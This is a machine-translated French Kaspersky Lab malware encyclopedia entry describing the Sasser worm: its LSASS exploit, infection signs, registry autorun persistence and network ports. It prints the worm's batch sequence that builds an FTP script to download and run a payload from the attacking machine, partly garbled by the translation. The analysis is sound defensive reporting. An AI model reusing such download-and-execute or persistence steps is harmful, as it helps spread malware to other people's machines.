CE SERVICE PEUT CONTENIR DES TRADUCTIONS GÉNÉRÉES PAR GOOGLE. GOOGLE DÉCLINE TOUTE GARANTIE, EXPLICITE OU IMPLICITE, Y COMPRIS LES GARANTIES D'EXACTITUDE, DE FIABILITÉ, AINSI QUE TOUTE GARANTIE IMPLICITE DE COMMERCIALISATION ET D'ADAPTATION À DES FINS PARTICULIÈRES ET À L'ABSENCE DE CONTREFAÇONS.

Le site internet de Kaspersky Lab a été traduit pour votre commodité en utilisant un logiciel de traduction générée par Google. Des efforts raisonnables ont été faits pour fournir une traduction exacte. Cependant, aucune traduction automatique n'est parfaite et l'objectif n'est pas de remplacer le travail des traducteurs. Le site internet de Kaspersky Lab fournit ces traductions comme un service pour ses utilisateurs, et elles ont été publiées "telles quelles". Aucune garantie, explicite ou implicite, n'est faite au sujet de l'exactitude, de fiabilité ou de conformité de ces traductions faites de l'anglais vers une autre langue. Certains contenus (images, vidéos, Flash, etc.) peuvent ne pas être traduits correctement à cause des limites du logiciel de traduction.

Net-Worm.Win32.Sasser

Date de la détection 05/13/2004
Classe Net-Worm
Plateforme Win32
Description

Sasser est un ver Internet qui exploite la vulnérabilité MS Windows LSASS décrite dans le Bulletin de sécurité Microsoft MS04-011 .

Microsoft a publié un correctif pour cette vulnérabilité le 13 avril 2004, tandis que Sasser.a a été détecté pour la première fois le 30 avril 2004.

Sasser fonctionne de manière très similaire à Lovesan, sauf que Lovesan a exploité une vulnérabilité dans le service PRC DCOM, pas le service LSASS.

Sasser affecte les ordinateurs fonctionnant sous Windows 2000, Windows XP, Windows Server 2003. Sasser fonctionne sur toutes les autres versions de Windows mais ne parvient pas à les infecter en attaquant via la vulnérabilité.

Sasser est écrit en C / C ++, en utilisant le compilateur Visual C. Le ver est d'environ 15 KL et est emballé par PECompact2.

Signes d'infection

  • le fichier 'avserve.exe' dans le répertoire Windows.
  • Un message d'erreur indiquant que le service LSASS échoue, ce qui provoque généralement le redémarrage du système.

Propagation

Après le lancement, Sasser se copie dans le répertoire racine Windows sous le nom avserve.exe et enregistre ce fichier dans la clé d'exécution automatique du registre système:

 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]



 "avserve.exe" = "% WINDIR% avserve.exe" 

Sasser crée un identifiant unique 'Jobaka31' dans la RAM pour localiser des copies de lui-même en cas de futures tentatives d'infection.

Sasser lance le serveur FTP sur le port TCP 5554, puis lance 128 routines de propagation. Au cours de ce processus, le ver tente d'initier le processus AbortSystemShutdown afin d'interdire le redémarrage du système.

Sasser lance une analyse d'adresse IP afin d'identifier les adresses des victimes et envoie une requête au port TCP 445. Si des machines répondent, Sasser exploite la vulnérabilité LSASS pour lancer un shell de commande 'cmd.exe' sur le port TCP 9996. Enfin Sasser, commande à la machine infectée de télécharger et de lancer le composant principal du ver sous le nom "N_up.exe", où "N" est un nombre aléatoire:

 Écho off



echo ouvert [adresse de la machine attaquante] 5554 >> cmd.ftp



echo anonyme >> cmd.ftp



utilisateur de l'écho



echo bin >> cmd.ftp



echo get [nombre aléatoire] _up.exe >> cmd.ftp



echo bye >> cmd.ftp



écho sur



ftp -s: cmd.ftp



[nombre aléatoire] _up.exe



Écho off



del cmd.ftp



écho sur 

Par conséquent, une machine peut être attaquée plus d'une fois et contenir plusieurs copies du ver avec des noms d'échantillons tels que:

 23101_up.exe



5409_up.exe 

et ainsi de suite.

Autre

Après l'infection, la machine victime génère un message d'erreur à propos d'un échec du service LSASS, après quoi elle peut tenter de redémarrer.

Sasser crée le fichier 'win.log' dans le répertoire racine du lecteur C où le ver enregistre les adresses IP de toutes les machines attaquées.


Lien vers l'original